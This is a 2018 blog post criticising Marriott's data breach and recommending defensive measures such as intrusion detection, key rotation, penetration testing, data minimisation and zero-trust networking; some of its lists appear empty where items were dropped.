Dan Munro - Dev-Sec-Ops Engineer   Archives  Recommendations  About

The Colossal, Monumental Screw Up That Is Marriott Security

From Decipher reporting:

For [173 million] affected customers, the attackers only had access to names and some address and email address data.

head-explodes.gif

For 327 million people, information compromised in the breach includes names, home addresses, phone numbers, email addresses, some passport numbers, dates of birth, and some payment card information.

…What does one even say to this?

Why did they have all this data in the first place?

Did Marriott not even have security engineers on staff?

Let’s examine at a high level a handful of defense and mitigation strategies that could have greatly improved Marriott’s response to this incident.

It’s important that these recommendations be implemented correctly. For example, an IDS which generates thousands of alerts, does not contribute any value. That is the definition of security theater.

Intrusion Detection Systems

Any IDS worth its weight in salt would have most likely significantly reduced the blast radius of this attack. It’s hard to say for certain when speaking in hypotheticals, but this is literally their job.

IDSs typically run as agents directly on host systems, and collate connections along with contextual information – source & destination IPs, commands executed, possible data extrusion attempts. Either via configuration, or machine learning, alerts can trigger on suspicious activity. Suspicious activity is not limited to:

If an IDS is in place, and is generating too many alerts, that’s worse than no IDS at all.

Regular Key And Certificate Rotation

A huge part of successful information security programs is change management. Keys and certs must be in regular rotation. An audit log must be kept up to date with what secrets were changed, and when. A log must also be kept for who has access to these secrets.

Manual rotation is a PITA, so automate it. Use Vault or another secret manager, and setup automatic key rotation.

Penetration Testing

Attack yourself, before the bad guys do. Because they will attack, if they haven’t yet. Use open source tools, such as OWASP ZAP, in order to proactively discover exploitable runtimes left on wide open ports.

Backbox Linux is an excellent pentesting linux distro. It comes loaded with ZAP and a host of other tools that will help in analyzing an infrastructure for security vulnerabilities.

Principle Of Least Data

Don’t store payment information. Use a payment processor and integrate with their API.

Why, why, were passport numbers stored on-site?

Isolate and segregate databases behind private networks. For example, isolate PII to a database within its own private network. Configure databases with strong, unique credentials. Rotate those credentials regularly (again, automation is essential here).

Here are pieces of data which may not need to be stored on site, or at least all in the same database, accessed by the same credentials:

If any of the above data is required, it should be partitioned into a secure enclave, or stored off site with third-party integrators.

Proactive CVE Handling

Scan build artifacts, application dependencies, and OS dependencies for known CVEs. Track progress on remediation.

Use KPIs like:

Zero Trust Networks

M & M security (a hardened perimeter with a soft, tasty interior) is not enough anymore. Consider any connection potentially hostile, even internal traffic. Use E2E encryption. Segregate and partition resources and authorizations.

Minimize permissions on credentials to bare minimum, single purpose use-cases. Then, name those credentials after that single purpose. For example, in AWS, define specific roles (not machine users), such as: ses-mailer, s3-uploader-svc-x, s3-viewer-svc-y.

Rant Summary

On the one hand, the levels of negligence involved to have allowed this to happen is utterly, mind-numbingly, staggeringly massive. There are processes, policies, and an endless list of proprietary and open source tools for monitoring, detecting, alerting, and responding to security events.

On the other hand, is anyone surprised? At all? It was only a year ago that Equifax failed to protect the personal information of over 147 million Americans. Yahoo’s hack, with all three billion accounts compromised, was disclosed just a year before that (the actual hack happened around 2013).

To summarize some of the strategies outlined above:

What will it take for information security to be taken seriously? Perhaps GDPR-like legislation is the future.

Written on Nov 30, 2018.